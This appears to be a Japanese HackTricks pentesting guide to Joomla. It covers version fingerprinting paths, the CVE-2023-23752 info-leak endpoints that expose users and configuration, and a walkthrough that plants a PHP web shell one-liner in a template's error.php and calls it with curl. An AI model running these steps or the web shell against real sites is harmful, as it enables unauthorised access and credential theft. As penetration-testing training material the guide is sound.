Joomla
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Joomlaは、Joomlaのインストールで使用されているJoomla、PHP、データベースのバージョンやサーバーのオペレーティングシステムの内訳など、いくつかの匿名の使用統計を収集します。このデータは、彼らの公開APIを介してクエリできます。
メタを確認する
robots.txt
README.txt
/administrator/manifests/files/joomla.xml でバージョンを確認できます。
/language/en-GB/en-GB.xml でJoomlaのバージョンを取得できます。
plugins/system/cache/cache.xml でおおよそのバージョンを確認できます。
In 80,443 - Pentesting Web MethodologyはCMSスキャナーに関するセクションですで、Joomlaをスキャンできます。
バージョン4.0.0から4.2.7は、認証なしの情報漏洩(CVE-2023-23752)に対して脆弱で、クレデンシャルやその他の情報をダンプします。
ユーザー: http://<host>/api/v1/users?public=true
設定ファイル: http://<host>/api/index.php/v1/config/application?public=true
MSFモジュール: scanner/http/joomla_api_improper_access_checks
またはrubyスクリプト: 51334
このスクリプトを使用して、ログインのブルートフォースを試みることができます。
もし管理者の資格情報を取得できたら、PHPコードのスニペットを追加することでRCEを実行できます。これをテンプレートをカスタマイズすることで行います。
Configuration
の下にある**Templates
をクリック**して、テンプレートメニューを表示します。
テンプレート名をクリックします。Template
列の下にある**protostar
を選択しましょう。これでTemplates: Customise
**ページに移動します。
最後に、ページをクリックしてページソースを表示できます。error.php
ページを選びましょう。以下のようにコード実行を得るためのPHPワンライナーを追加します:
system($_GET['cmd']);
保存して閉じる
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Joomlaの脆弱性を利用するスクリプトで、XSSをRCEまたはその他の重大な脆弱性に昇格させます。詳細はこの投稿を確認してください。Joomlaバージョン5.X.X、4.X.X、3.X.Xをサポートし、以下を可能にします:
特権昇格: Joomlaにユーザーを作成します。
(RCE) ビルトインテンプレートの編集: Joomlaのビルトインテンプレートを編集します。
(カスタム) カスタムエクスプロイト: サードパーティのJoomlaプラグイン用のカスタムエクスプロイト。
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)